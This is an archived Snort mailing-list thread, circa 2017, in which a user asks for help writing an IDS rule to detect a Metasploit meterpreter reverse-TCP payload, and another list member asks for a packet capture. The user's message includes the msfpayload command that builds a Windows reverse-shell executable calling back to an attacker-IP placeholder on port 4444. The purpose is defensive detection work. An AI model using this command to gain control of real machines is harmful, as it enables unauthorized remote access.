Snort mailing list archives

Previous By Date Next
Previous By Thread Next

Re: how to write rule for msfpayload in linux

From: nguyen cao via Snort-users <snort-users () lists snort org>
Date: Sun, 19 Nov 2017 08:31:26 +0700
On the attacker I use: msfpayload windows/meterpreter/reverse_tcp
LHOST=(IP_attacker)​
 msfpayload2
<https://drive.google.com/file/d/10MzIeyeThWHMfuhNyDJTuG3Y4QJ_qjcA/view?usp=drive_web>
​ LPORT=4444 X > /root/Desktop/payload.exe ( in order to create file
payload.exe).
When I run file payload.exe on PC victim , I will take control system of
victim. I run wireshark and match packet but I do not know where to start
in order to write rule for type this attack



2017-11-19 2:16 GMT+07:00 DFIRob <rd.seclists () gmail com>:


Hi, do you have a pcap that you want to alert on?

On Sat, Nov 18, 2017 at 3:22 PM, nguyen cao via Snort-users <
snort-users () lists snort org> wrote:


who can help me about write rule for msfpayload in linux ?
creat payload by msfpayload : msfpayload windows/meterpreter/reverse_tcp
LHOST=/ /  LPORT=/ /....

_______________________________________________
Snort-users mailing list
Snort-users () lists snort org
Go to this URL to change user options or unsubscribe:
https://lists.snort.org/mailman/listinfo/snort-users

Please visit http://blog.snort.org to stay current on all the latest
Snort news!

Please follow these rules: https://snort.org/faq/what-is-
the-mailing-list-etiquette





_______________________________________________
Snort-users mailing list
Snort-users () lists snort org
Go to this URL to change user options or unsubscribe:
https://lists.snort.org/mailman/listinfo/snort-users

Please visit http://blog.snort.org to stay current on all the latest Snort news!

Please follow these rules: https://snort.org/faq/what-is-the-mailing-list-etiquette
Previous By Date Next
Previous By Thread Next

Current thread: